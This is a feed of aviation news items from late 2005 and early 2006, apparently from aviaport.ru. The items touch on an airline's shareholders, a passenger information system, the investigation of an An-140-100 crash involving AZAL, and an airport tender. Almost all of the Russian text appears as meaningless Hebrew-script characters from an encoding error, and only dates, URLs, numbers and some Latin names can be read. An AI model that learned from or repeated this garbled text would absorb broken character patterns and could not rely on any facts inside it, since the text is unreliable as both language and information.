׃ֱֵּֽֿװ. י טֱֱֲֿׂ׳׃ֱֻ ׳ ׀ֵׂ׳ ִֵ־״ ֱִַֿ ֽֿײ־ֿ ׳ֱֲׂװ״׃ׁ װּֿ״ֻֿ ׀ִֵֽֿֿ, ֱ װֱֻײֵ ֱ׳װֿװֱׂ־׃׀ֿׂװֽֿ - Mon, 02 Jan 2006 13:03:00 +0300 - נֵׂ׳ַֿֿ ׁ־׳ֱׁׂ ֹ טֱֱֲֿׂ׳׃ֱֻ ־ֵ ׳ֵּװֹװ ־ֹ ִֹֿ־ ׃ֱֵּֽֿװ. קֿװ ֱֻֻ ׀ֵֻֽֽֿֿׂ־װֹֿׂ׳ֱֹּ ׃ֹװױְֱֳֹ ֵֻֿׂׂ׃׀ֿ־ִֵ־װױ יב REGNUM ׳ ִֹ׃׀ֵװֵׂ׃ֻֿ טֱֱֲֿׂ׳׃ַֻֿֿ ֱֿׂ׀ֿׂװֱ: "ףִֵַֿ־ׁ ־ֹ ִֹֿ־ ׃ֱֵּֽֿװ ָֹ טֱֱֲֿׂ׳׃ֱֻ ־ֵ ׳ֵּװֹװ. פֱֱֻׁ ׃ֹװױֱֳֹׁ ׳ טֱֱֲֿׂ׳׃ֵֻ ׳׀ֵׂ׳ֵ. ףֱֵּֽֿװ ֹ ֱִַֿֿׂ ־ֵ ׳ֵּװְֱװ ־ֵ ׀ֿ ׀ֹֹׂ־ֵ ־ֵֹ׃׀ֱׂ׳־ֿ׃װֹ, ֱ ׀ֿ ׀ֹֹׂ־ֵ ֿװ׃ױװ׃װ׳ֹׁ ֵׂ׃ֿ׳. ןװ ־ֱ׃ ׳ מֿ׳ ִַֿ ־ֹֻװֿ ־ֹֻױֱִ ־ֵ ֵּװֹװ. ב׳ֱֹװֿׂ ֿװְֱִָװ".י טֱֱֲֿׂ׳׃ֱֻ ׳ ׀ֵׂ׳ ִֵ־״ ֱִַֿ ֽֿײ־ֿ ׳ֱֲׂװ״׃ׁ װּֿ״ֻֿ ׀ִֵֽֿֿ, ֱ װֱֻײֵ ֱ׳װֿװֱׂ־׃׀ֿׂװֽֿ. - - - - - "פֱׂ־׃ֱֿׂ" ֱׂ׃ֻּֿׂ ׃װׂױֻװױׂױ ֱֳֹֻֿ־ֵׂ־ַֿֿ ֱֻ׀ֹװֱֱּ - http://www.aviaport.ru/news/2005/12/29/99267.html - ןבן "ב׳ֱֹֻֽֿ׀ֱ־ֹׁ "פֱׂ־׃ֱֿׂ" ֱׂ׃ֻּֿׂ ׃װׂױֻװױׂױ ׃׳ֵַֿֿ ֱֳֹֻֿ־ֵׂ־ַֿֿ ֱֻ׀ֹװֱֱּ. 32,1% ֱֳֹֻ ֻֿ־װֹּֿׂׂױֵװ "לַֿֿקבת-ל", 44,1% ׳ְֱִֵּװ ֵּ־ ׃ֵֽ״ֹ ב. נֱֵֻּֿ׳ֱ - Thu, 29 Dec 2005 17:30:00 +0300 - ןבן "ב׳ֱֹֻֽֿ׀ֱ־ֹׁ "פֱׂ־׃ֱֿׂ" ֱׂ׃ֻּֿׂ ׃װׂױֻװױׂױ ׃׳ֵַֿֿ ֱֳֹֻֿ־ֵׂ־ַֿֿ ֱֻ׀ֹװֱֱּ. כֱֻ ׃ִֵּױֵװ ֹ ֱֳֶֹֹּֿ״־ָ ֱֽװֱֵֹּֿׂ׳ ֻֽֿ׀ֱ־ֹֹ, 32,1% ֱֳֹֻ ֻֿ־װֹּֿׂׂױֵװ "לַֿֿקבת-ל", 44,1% ׳ְֱִֵּװ ֵּ־ ׃ֵֽ״ֹ ׀ִֵׂ׃ֱִֵװֵּׁ ׃ֿ׳ֵװֱ ִֵֹֻׂװֿֿׂ׳ "פֱׂ־׃ֱֿׂ" בֵֻּ׃ֱ־ֱִׂ נֱֵֻּֿ׳ֱ. "לַֿֿקבת-ל", ױֵׂײִֵ־־ ׳ 1996 ִַֿױ ֻֽֿ׀ֱ־ֵֹ "לַֿֿקבת", ֻֿ־װֹּֿׂׂױֵװ ֱֳֹֹֻ "פֱׂ־׃ֱֿׂ" ֵֵׂ ׃׳ֹֿ ִֵֿׂ־ֵֹ ׃װׂױֻװױׂ - תבן גֵֿׂ-2" ֹ תבן "עֱװֹֽׂ+". נֿ ֱִ־־ֽ ֹ׃װֿ־ֱֹֻ "י־װֱֵֶֻׂ׃ֱ" ׳ ֱ׳ֱֳֹֹֿ־־ֿ ֿװֱׂ׃ֹּ, ׃ֱֵ׃ "לַֿֿקבת-ל" ױײֵ ־ֵ ׀ֹׂ־ֱִֵּײֹװ "לַֿֿקבתױ".ףֱַּֿ׃־ֿ ִֻֿױֵֽ־װױ, ׀ִֵׂ׃ֱִֵװְֵּ ׃ֿ׳ֵװֱ ִֵֹֻׂװֿֿׂ׳ "פֱׂ־׃ֱֿׂ" בֵֻּ׃ֱ־ִׂױ נֱֵֻּֿ׳ױ ׀ֹׂ־ֱִֵּײֹװ 32,81% ֲֻֿ־ֿ׳ֵ־־ָ ֱֳֹֻ, ֱ ֵַֿ ׃ױ׀ׂױֵַ, ֵַ־ֱֵּׂ״־ֽֿױ ִֵֹֻׂװֿׂױ בן ןּ״ֵַ נֱֵֻּֿ׳ֿ - 8,08%. כֵֽֿׂ װַֿֿ, 3,25% ֱֳֹֻ "פֱׂ־׃ֱֿׂ" ׀ֹׂ־ֱִֵּײֱװ ֱֽװֵֹׂ נֱֵֻּֿ׳ֱ, ׀ִֵׂ׃ֱִֵװְֵּ םֵײַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֱ׳ֱֳֹֹֿ־־ַֿֿ ֹֻֽֿװֵװֱ פֱװ״ׁ־ֵ ב־ִֹֿ־ֿ.ןבן "ב׳ֱֹֻֽֿ׀ֱ־ֹׁ "פֱׂ־׃ֱֿׂ" ׀ֿ ׀ֱ׃׃ֱײֲֹֿֿֿֿׂׂװױ ׳ִָֹֿװ ׳ ֹ׃ּֿ ׀ׁװֹ ֻׂױ׀־ֵָֹ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ. קׂױֱֻ ֿװ ֱֱֳֵֹֹֹּׂ ֱ 11 ֵֽ׃ֳֵׁ׳ 2005 ֱִַֿ - 8,9 ִּֽׂ ׂױֲֵּ, ׀ֱ׃׃ֱײֲֹֿֿֿֿׂׂװ - 4,8 ִּֽׂ ׀ֱ׃׃ֱײֹֿׂ-ֵֹֻּֽֿװֿׂ׳. - - - - - ק ֱֿׂ׀ֿׂװױ "כױׂױֽֿ" ־ֱֱֱּ ִֵ׃װ׳ֿ׳ֱװ״ ־ֿ׳ֱׁ ׃׀ֱׂ׳ֿ־ֱׁ ׃ֹ׃װֱֵֽ TouchTown (ףֱֱֱֽׂ) - http://www.aviaport.ru/news/2005/12/29/99266.html - ק םֵײִױ־ֱִֿׂ־ֽֿ ֱֿׂ׀ֿׂװױ "כױׂױֽֿ" ־ֱֱֱּ ִֵ׃װ׳ֿ׳ֱװ״ ־ֿ׳ֱׁ י־ֱֳֶֹֽֿֿׂ־־ֿ-׃׀ֱׂ׳ֿ־ֱׁ ׃ֹ׃װֱֵֽ TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ק םֵײִױ־ֱִֿׂ־ֽֿ ֱֿׂ׀ֿׂװױ "כױׂױֽֿ" ־ֱֱֱּ ִֵ׃װ׳ֿ׳ֱװ״ ־ֿ׳ֱׁ י־ֱֳֶֹֽֿֿׂ־־ֿ-׃׀ֱׂ׳ֿ־ֱׁ ׃ֹ׃װֱֵֽ TouchTown, - ׃ֲֹֹּֿֿ ֵֻֿׂׂ׃׀ֿ־ִֵ־װױ יב REGNUM-קֱַּֿי־ֶֽֿׂ ׳ ׀ֵׂ׃׃-׃ּױײֲֵ ֱֿׂ׀ֿׂװֱ. חֱּ׳־ֽ ִֿ׃װֹֿ־׃װ׳ֽֿ ׃ֹ׃װֵֽ ׁ׳ֵּׁװ׃ׁ ֿ׀ֱֵׂװֹ׳־ֵֿ ׀ִֵֿׂ׃װֱ׳ֵּ־ֵֹ ־ֲִֵָֹֽֿֿֿ ׀ֱ׃׃ֱײֹׂױ ֹ־ֱֳֶֹֹֽֿׂ ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹֽ ֱֲֵַׂ־ֹ־ָ ׳ֽֿֿײ־ֿ׃װֵ ֽױּ״װֱִֵֹֹֽ. פֵ׀ֵׂ״ ֱ׳ֱֹ׀ֱ׃׃ֱײֹׂ ׀ֹׂ ׀ֹֽֿֿ ׃ֵ־׃ֿׂ־ַֿֿ װֵֹֽׂ־ֱֱּ ַֽֿױװ ׀ּֿױֹװ״ ׀ֱֻׂװֵֹ׃ֹֻ ְֲּױְ ֹ־ְֱֳֶֹֽֿׂ ־ֵ װּֿ״ֻֿ ֲֿ ֱֿׂ׀ֿׂװֵ, ־ֿ ֹ ׀ֿ ףֱֱֵֽׂ ׳ ֳֵּֽֿ. פֱֻ, ֱִ־־ֵ ׃ֹ׃װֵֽ "TouchTown" ׀ִֵֵּֿ־ ־ֱ ִ׳ֱ ֱֲֻּֿ: "נױװֵ׳ִֹֿװֵּ״ ׀ֿ םֵײִױ־ֱִֿׂ־ֽֿױ ֱֿׂ׀ֿׂװױ "כױׂױֽֿ" (ִֵ׃״ ׀ֱ׃׃ֱײֹׂ ַֽֿױװ ׀ֿ־ֱֹֻֽֿװ״׃ׁ ׃ ׀ֱּ־ֽֿ ׀ֵֵֽֿ־ֹ ֱֿׂ׀ֿׂװֱ ֹ ׀ְֱֵֵַֹּׂ ֻ ־ֵֽױ װֵֹׂׂװֹֹֿׂ, ֱ װֱֻײֵ ױ־ֱװ״ ֿ ׀ִֵֿׂ׃װֱ׳ֵָּֽׁ ױ׃ּױֱַָ) ֹ "ק׃ׁ ףֱֱֱֽׂ" (׳ ֲֵֻּֿ ׃ִֵֿׂײֹװ׃ׁ ֹ־ֱֳֶֹֽֿׁׂ ֿ ַֿ׃װֹ־ֱֳָֹ, ֵֽ׃װֱָ ֿװֱִָ, ֱׂ׳ֱֵֻּװֵּ״־ָ ֹ װַֿֿׂ׳ָ ֳֵ־װֱָׂ, ֻֽֿ׀ֱ־ָֹׁ, ֱֻֿ׳ְֱָֹ ֱֹּׂ־ֵ ׀ֿװֲֵֹׂװֵּ״׃ֵֹֻ ױ׃ּױַֹ). - - - - - טחבננ ׀ֹׂ׳ֱֵװ ײױׂ־ֱֹּ׃װֿ׳ ֲװ״ ֱֻֽ׃ֱֹּֽ״־ֿ ֵֻֻֿׂׂװ־ֹֽ ׳ ׃ֲֵֿֿ־ָֹׁ ֿ ֱֲֿׂװֵ ֹֻֽֿ׃׃ֹֹ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ק גֱֻױ ׃ֿ׃װֱּֿׁ׃״ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹׁ ׀ֿ ֹװֱַֽֿ ׀ִֵׂ׳ֱֹׂװֵּ״־ַֿֿ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 ֱֲִֵֻׁׂ 2005 ַ. ׳ גֱֻױ ׃ֿ׃װֱּֿׁ׃״ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹׁ ׀ֿ ֹװֱַֽֿ ׀ִֵׂ׳ֱֹׂװֵּ״־ַֿֿ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100. ן ֵׂױּ״װֱװֱָ ֱֲֿׂװ ִּֿֿײֹֹּ ֿװ ֵֹֽ־ֹ ֹֻֽֿ׃׃ֹֹ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ הײֱֱָ־ַֹׂ ב׃ֵֻֿׂ׳ - ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֻֿ־ֳֵׂ־ֱ AZAL, נֱ׳ֵּ מֱױֵֽ־ֻֿ - ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ טֱׂ״ֻֿ׳׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֱ׳ֱֳֹֹֿ־־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ַֿֿ ׀ִֵׂ׀ֹׁׂװֹׁ, גֹֿׂ׃ חְֿׂ־ֿ׳ - ׀ִֵׂ׃װֱ׳ֹװֵּ״ םֵײַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ב׳ֱֳֹֹֿ־־ַֿֿ כֹֽֿװֵװֱ, קֹװֱֹּ םֵֹ־ֻֿ - ִֵֹֻׂװֿׂ ִֵ׀ֱׂװֱֵֽ־װֱ ֹ־׃׀ֵֻװֹֿׂ׳ֱ־ֹׁ ֲֵֿ׀ֱ׃־ֿ׃װֹ ׀ֵּֿװֿ׳ חֿ׃ֱ׳ֱֹ׃ּױײֲ ץֱֹֻׂ־, יּ״ֱַֽ בֹֽֿׂ׳ - ׀ִֵׂ׃ֱִֵװֵּ״ װֵָ־ֵֹ׃ֻֿ ֹֻֽֿ׃׃ֹֹ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ֱֻװֱ׃װֶֿׂ. קֿ ׳ֵֽׁׂ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹֹ ֱֲּ ֱֵַּֿ־ֱ ׃ִֵּױְֱׁ ֹ־ֱֳֶֹֽֿׁׂ.23 ֱֲִֵֻׁׂ 2005 ַ. ׀ֿ׃ֵּ ׳ֵּװֱ ֹ ֱֿׂ׀ֿׂװֱ גֱֻױ ׀ֿװֵׂ׀ֵּ ֱֻװֱ׃װֶֿׂױ ׳ ֱֿׂ־ֵ ׀ֿ׃ֱֵֻּ מֱֱֱִׂׂ־ ־ֱ ׀ֲֵֵֿׂײ״ֵ כֱ׃׀ֹ׃ַֻֿֿ ֽֿׁׂ ׃ֱֵּֽֿװ ב־-140-100 (־ֱֳֹֿ־ֱּ״־ ֹ ֵַֹׂ׃װֱֳֹֿׂ־־ ־ֱֻ 4כ-AZ48) מֱֳֹֿ־ֱּ״־ֿ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ "בֱֲִֵׂײֱ־ טֱ׳ֱ ךֱּּֿׂ". ףֱֵּֽֿװ, ׳׀ּֿ־ׁ׳ֹ ֵׂ׃ AHY 217 ׀ֿ ֱֽׂׂױװױ גֱֻױ (בֱֲִֵׂײֱ־) - בֻװֱױ (כֱֱָ׃װֱ־) ֵֹּֽ ־ֱ ֲֿׂװױ 18 ׀ֱ׃׃ֱײֹֿׂ׳ ֹ 5 ֵּ־ֿ׳ ֹֻ׀ֱײֱ (ֱֻֽֿ־ִֹׂ לֱ׳ֹׂ־ ב.ב.). ק ֵׂױּ״װֱװֵ ֱֻװֱ׃װֶֿׂ ׀ֲַֹּֿֿ 23 ֵּֿ׳ֱֵֻ, ־ֱִָֹֿ׳ָֹ׃ׁ ׳ ׃ֱֵּֽֿװֵ, ׳ װֽֿ ֹ׃ֵּ 5 ֵּ־ֿ׳ ֹֻ׀ֱײֱ ֹ 18 ׀ֱ׃׃ֱײֹֿׂ׳, ׃ִֵֹׂ ֻֿװָֿׂ ֲֹּ ֱַׂײֱִ־ֵ בֱֲִֵׂײֱ־ֱ (10), ב׳׃װֱֹֹּׂ (1), קֲֵֹֹֻּֿׂװֱ־ֹֹ (1), חׂױֹֹ (1), כֱֱָ׃װֱ־ֱ (4), ֹ פױֳֹֹׂ (1). קף ׀ּֿ־ֿ׃װ״ְ ֱׂׂױֵ־ֿ.ק ֵׂױּ״װֱװֵ ֱַֿׂ־ֹֿ׳ֱ־־ַֿֿ ׀ֹֿ׃ֱֻ ֲֹֻּֽֿֿ קף ֲֹּ ֲֿ־ֱׂױײֵ־ ־ֱ ֲֵֵַֿׂ׳ֿ ֵׂװֵ ׳ ֱֿׂ־ֵ ־ֱ׃ֵֵּ־־ַֿֿ ׀ױ־ֻװֱ מֱֱֱִׂׂ־. נֿׂ׳ִֵֵ־ֵֹ ֱ׳ֱֹׂ־ֿ-׃׀ֱ׃ֱװֵּ״־ָ ֱֲֿׂװ ֿ׃ּֿײ־ּֿׁ׃״ װֵֽ־ֽ ׳ֵֵֽׂ־ֵֽ ׃ױװֻֿ ֹ ־ֱֲֵַּֿ׀ֹׁׂװ־ֹֽ ׀ִַֿֿ־ֹֽ ױ׃ּֿ׳ֹֹֽׁ (־ֱֹֻׁ ֱֲּֿ־ֿ׃װ״, ִֿײִ״, ׳ֵװֵׂ ֹ ׳ּֿ־ֵ־ֵֹ ֽֿׁׂ). כ ׀ֹֿ׃ֻֿ׳ֽ ֱֲֿׂװֱֽ ־ִֵֵֵּֽ־־ֿ ֲֹּ ׀ֹׂ׳ֵֵּ־ ׃ֹּ ֱ׳ֱֹׂ־ֿ-׃׀ֱ׃ֱװֵּ״־ָ ׃ּױײֲ, םקה, חֿ׃ױֱִׂ׃װ׳ֵ־־ֿ ׀ֱַֿׂ־ֹ־ֿ ׃ּױײֲ, חֱׂײֱִ־׃ֻֿ ֲֿֿֿׂ־ עֵ׃׀ױֲֹֹֻּ בֱֲִֵׂײֱ־. ק ִֵָֿ ֱֲֿׂװ ֲֹּ ׳ֱֻױֹֿׂ׳ֱ־ ֿ׃װֱ־ֹֻ ׳׃ֵָ ׀ֲַָֹֹֿ. נִּֿֿׂײְֱװ׃ׁ ֱֲֿׂװ ׀ֿ ׀ֹֿ׃ֻױ ֹ ֹ׳ֵֵּ־ְֹ ֹ ֽֿׁׂ ֱֵֶַֽׂ־װֿ׳ קף.כֹֽֿ׃׃ֹׁ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ֱ׳ֱֱֹֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100 4כ-AZ48, ֹױֹ׳ ֱִ־־ֵ ֲֵֻֿװֹ׳־ַֿֿ ֻֿ־װּֿׁׂ, ׃־ׁװֵ ׃ ֱֵֹ־־ַֿֿ ֲֿׂװֿ׳ַֿֿ ־ֱֻֿ׀ֹװֵּׁ ױ׃װֿׂ׃װ׳ֱ ֵַֹׂ׃װֱֳֹֹׂ גץע-92ב, ֱ װֱֻײֵ, ׃ֿ׀ֿ׃װֱ׳ֹ׳ ָֹ ׃ ֹ־ֱֳֵֶֹֽֿׂ ִֹ׃׀ֵװֵׂ׃ָֹֻ ׃ּױײֲ, ֱֽװֱֱֵֹֹּֽׂ, ׃ֱֲֿׂ־־ֹֽ ־ֱ ֵֽ׃װֵ ֱֻװֱ׃װֶֿׂ, ׳ֿ׃׃װֱ־ֿ׳ֱֹּ ׀ִֵׂ׳ֱֹׂװֵּ״־ֿ ׃ִֵּױְױְ ֱֻׂװֹ־ױ ׃ֲֿװֹ.קֵּװ ׃ֿ׃װּֿׁ׃ׁ ׳ ׃ֿֿװ׳ֵװ׃װ׳ֹֹ ׃ ֱׂ׃׀ֹ׃ֱ־ֵֹֽ. מֱ װֱ׀ֵ ־ֱֱֲֿׂ ׳׃ֿװ ׀ֹּֿֿֿׂ ױֻּֿ־ֵ־ֵֹ ׳ִֿױ־ַֿֿ ׃ױִ־ֱ (קף) ֿװ ױ׃װֱ־ֿ׳ֵּ־־ֿ װֱֵֻׂװֹֹֿׂ ׀ֵּֿװֱ. תֱװֵֽ ֹֻ׀ֱײ ׃ֲֹּֿֿ ׃ּױײֲֵ ץקה ֿ װֵָ־ֵֹ׃ָֹֻ ׀ֱֲֵָּֽֿׂ ־ֱ ֲֿׂװױ קף. ‏ֵֵׂ ־ֵ׃ֻּֿ״ֻֿ ׃ֵֻױ־ִ ׃׳ׁ״ ׃ ֹֻ׀ֱײֵֽ ׀ֿׂ׀ֱֱּ, ֱ ֿװֵֽװֱֻ קף ֹ׃ֱֵּ ׃ ֱֻׂ־ֿ׳ ֱֱֱִׂׂ. נֿ ֱִ־־ֽ ֲֵֻֿװֹ׳־ַֿֿ ֻֿ־װּֿׁׂ ׀ֿ׃ֵּ ־ֱֱֲֿׂ ׳׃ֿװ ִֿ 2100 ֽ ׃ֱֵּֽֿװ ־ֱֱּ ׃־ֹײֵ־ֵֹ ׀ֿ ־ֹ׃ִֵָֿׁ ׃׀ֱֹֹּׂ ׃ ױֵֽ־״ְֱֹֹֽ׃ׁ ֱִֹׂױ׃ֱֹֽ ֿװ 500 ֽ ִֿ 100 ֽ, ׃ֿ׳ֵֹׂ׳ ׀ֹׂ װֽֿ 4,5 ׳ֹװֱֻ.עֱ׃ֶֹֿׂ׳ֱֻ ֲֿׂװֿ׳ַֿֿ ױ׃װֿׂ׃װ׳ֱ ֵַֹׂ׃װֱֳֹֹׂ ׀ֱֱֱֻּֿ, װֿ ִ׳ֱַֹװֵֹּ קף, ׃ֹ׃װֵֽ ױ׀ֱׂ׳ֵּ־ֹׁ, ־ֵַֿׂ׃־ֱֲײֵ־ֹׁ ֹ ִׂױֵַֹ ֲֹּ ֹ׃׀ֱׂ׳־ ֹ ֱֲֿׂװֿ׃׀ֿ׃ֲֿ־.מֱ װֱ׀ֵ ־ֱֱֲֿׂ ׳׃ֿװ ֲֿׂװֿ׳ֽ ױ׃װֿׂ׃װ׳ֽֿ ֵַֹׂ׃װֱֳֹֹׂ ֲּֿ ֱֶֹֻ׃ֹֿׂ׳ֱ־ֿ ִֿ־ֿ׳ֵֵֽׂ־־ֵֿ ֿװ׃ױװ׃װ׳ֵֹ ֹ־ֱֳִֹֹֹֻ ֹֻ׀ֱײױ ׳׃ֵָ װֵָׂ ֱ׳ֱַֹֹֿֿׂ־װֿ׳ (ֱ׳ֱַֹֹֿֿׂ־װ - ׀ֲֹֿׂׂ, ׀ֱֻֿ׳ְֱֹ ֹֻ׀ֱײױ ׀ּֿֿײֵ־ֵֹ קף ׳ ׀ֿׂ׃װֱׂ־׃װ׳ֵ).כ ־ֱ׃װֵֽֿׁױ ׳ֵֵֽׂ־ֹ ׀ֹֹׂ־ֱ ֿװ׃ױװ׃װ׳ֹׁ ֹ־ֱֳִֹֹֹֻ ֱ׳ֱַֹֹֿֿׂ־װֿ׳ ־ֵ ױ׃װֱ־ֿ׳ֵּ־ֱ. חֵ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ ֻֿ־ֳֵׂ־ֱ AZAL הײֱֱָ־ַֹׂ ב׃ֵֻֿׂ׳ ֱׁ׳ֹּ ־ֱ ׀ֵׂ׃׃-ֻֿ־ֵֶׂ־ֳֹֹ: "װֱ ׃ֹװױֱֳֹׁ ־ֵ ׃װֱ־ֱִׂװ־ֱׁ ֹ ױ־ֱֹֻּ״־ֱׁ, ׀ֿװֽֿױ װֿ, װֿ ׀ֹּֿֿֿׂ, ׁ׳ֵּׁװ׃ׁ ׃ִֵּ׃װ׳ֵֹֽ ־ֵָֹֻ ׃ֲֿװֹ, ֻֿװֵֿׂ ֲױִױװ ֹױֱװ״׃ׁ". עֱֲֿװֱ ֹֻֽֿ׃׃ֹֹ ׀ִּֿֿׂײֱֵװ׃ׁ.נֿ ֵֵֻֽֿׂ־ֱֳִֹֹ ֹֻֽֿ׃׃ֹֹ נֱׂ׳ֹװֵּ״׃װ׳ֿ בֱֲִֵׂײֱ־ֱ ׀ֹׂ־ּֿׁ ֵֵׂ־ֵֹ ׳ֵֵֽׂ־־ֿ ׀ֹֿׂ׃װֱ־ֿ׳ֹװ״, ִֿ ֱ׳ֵֵׂ־ֹׁ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ֱֻװֱ׃װֶֿׂ, ֻ׃׀ּױֱװְֱֳֹ ב־-140-100 ׳ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ "בֱֲִֵׂײֱ־ טֱ׳ֱ ךֱּּֿׂ". כֿ־װֱֻׂװ ֵֽײִױ ֻֿ־ֳֵׂ־ֽֿ AZAL ֹ טֱׂ״ֻֿ׳׃ֹֻֽ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֽ ֱ׳ֱֳֹֹֿ־־ֽ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֽ ׀ִֵׂ׀ֹׁׂװֵֹֽ ֿ׃װֱֵװ׃ׁ ׳ ׃ֵֹּ, ִֿ־ֱֻֿ ׃ֹֻֿׂ ׳׀ּֿ־ֵ־ֹׁ ֵַֿ ֲױִױװ ׃ֵֻֻֿׂׂװֹֿׂ׳ֱ־ ׃ ױֵװֽֿ ֻֿֿ־ֱװֵּ״־ָ ׳׳ִֿֿ׳ ֹֻֽֿ׃׃ֹֹ, ֻֿװֵֿׂ ֱַּֿ׃ׁװ ׀ֿ ֵׂױּ״װֱװֱֽ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100, ׀ִֵֵֹֿֿׂ 23 ֱֲִֵֻׁׂ 2005 ֱִַֿ.מֱ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹֹ, ׃ֿ׃װֿׁ׳ֵ׃ׁ 28 ֱֲִֵֻׁׂ ׳ גֱֻױ, ֲּֿ ֱֵַּֿ־ֿ ֱׁ׳ֵּ־ֵֹ ֹֻֽֿ׃׃ֹֹ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ, ׃ֱַּֿ׃ֿ׳ֱ־־ֵֿ ׃ֿ ׳׃ֵֹֽ ֵֵ ױֱ׃װ־ֱֹֹֻֽ, ׳ װֽֿ ֹ׃ֵּ ֹ ׃ ׀ִֵׂ׃װֱ׳ֹװֵֹּֽׁ טחבננ. נֿװֽֿױ ׀ױֱֲֳֹֹֹֻּ ֱִׁׂ ֵֻּװֿׂ־־ָ ףםי, ׃ִֵֿׂײֱֵֹ ֹ־ְֱֳֶֹֽֿׂ ֿ װֽֿ, "װֿ ׀ֹֿׂ׳ִֹֿװֵֹּ ׃ֱֵּֽֿװֿ׳ ־ֵ ׃ֱַּֿ׃־ ׃ ׳׳ֱִֹֽֿ ֹֻֽֿ׃׃ֹֹ", ־ֵ ׃ֿֿװ׳ֵװ׃װ׳ױְװ ִֵ׃װ׳ֹװֵּ״־ֿ׃װֹ.טחבננ ֱֱֲֵֿׂװ ׳־ֱֹֽ־ֵֹ ־ֱ ־ִֵֿ׀ױ׃װֹֽֿ׃װ״ ׀ֹֿׂ׳ּֿ״־ָ ֹ־װֵׂ׀ֵׂװֱֳֹ ׀ֳֹֹֹֿ ׀ִֵׂ׀ֹׁׂװֹׁ ֹ ׀ִֵֹֻֿׂ׳ֱֵװ, װֿ ־ֹ ׳ ִֿ־ֽֿ ֹ ֹ־װֵׂ׳״ְ, ֱִ־־ֽֿ ׀ִֵׂ׃װֱ׳ֹװֵּֽׁ ףםי, ־ֹ ִֹֿ־ ֹ ׂױֻֿ׳ִֹֿװֵֵּ ׀ִֵׂ׀ֹׁׂװֹׁ ־ֵ ׳׃ֱֻ׳ֱּ ־ֹ ׳ֵׂ׃ֹ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140-100, ־ֹ ֽ־ֵ־ֹ, ׀ֿׂװֹ׳ֱֵָֹֿׂ ׳׳ֱִֽֿ ֹֻֽֿ׃׃ֹֹ ׀ֿ ֵֵ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ. - - - - - בֿׂ׀ֿׂװ "טֵׂ׃ֿ־" ֵֹװ ֳֵֿ־ֱֹֻ - http://www.aviaport.ru/news/2005/12/29/99264.html - לֹֻ׳ִֹֹׂױֵֵֽֿ ֻֽֽֿױ־ֱּ״־ֵֿ ׀ִֵׂ׀ֹׁׂװֵֹ "בֿׂ׀ֿׂװ "טֵׂ׃ֿ־" ֲֿׁ׳ֹּֿ ֻֿ־ֻױׂ׃ ׀ֿ ֿװֲֿׂױ ֳֵֿ־ֱֹֻ ׃׳ֵַֿֿ ֳֵּֿ׃װ־ֿ-ֹֽױֵ׃װ׳ֵ־־ַֿֿ ֻֽֿ׀ֵֻּ׃ֱ - Thu, 29 Dec 2005 16:57:00 +0300 - לֹֻ׳ִֹֹׂױֵֵֽֿ ֻֽֽֿױ־ֱּ״־ֵֿ ׀ִֵׂ׀ֹׁׂװֵֹ "בֿׂ׀ֿׂװ "טֵׂ׃ֿ־" ֲֿׁ׳ֹּֿ ֻֿ־ֻױׂ׃ ׀ֿ ֿװֲֿׂױ ֳֵֿ־ֱֹֻ ׃׳ֵַֿֿ ֳֵּֿ׃װ־ֿ-ֹֽױֵ׃װ׳ֵ־־ַֿֿ ֻֽֿ׀ֵֻּ׃ֱ.ןֲ װֽֿ ַֿ׳ֹֿׂװ׃ׁ ׳ ׃ֲֵֿֿ־ֹֹ ֱֿׂ׀ֿׂװֱ, ׃ֱֲֵֿֿװ ץֱֻׂї־׃״ֻі מֿ׳ֹ־ֹ.ןֳֵ־ֱֻ ׀ֿׂ׳ִֹֿװ׃ׁ ִּׁ ױ׃װֱ־ֿ׳ֵּ־ֹׁ ֱֱֵֽׂׂ ׳־ֿ׃ֱ ׳ ױ׃װֱ׳־ ֶֿ־ִ, ֻֿװֿׂ ׳־ֿ׃ֹװ׃ׁ טֵׂ׃ֿ־׃ֹֻֽ ֱֲּֿ׃װ־ֽ ׃ֿ׳ֵװֽֿ ׳ 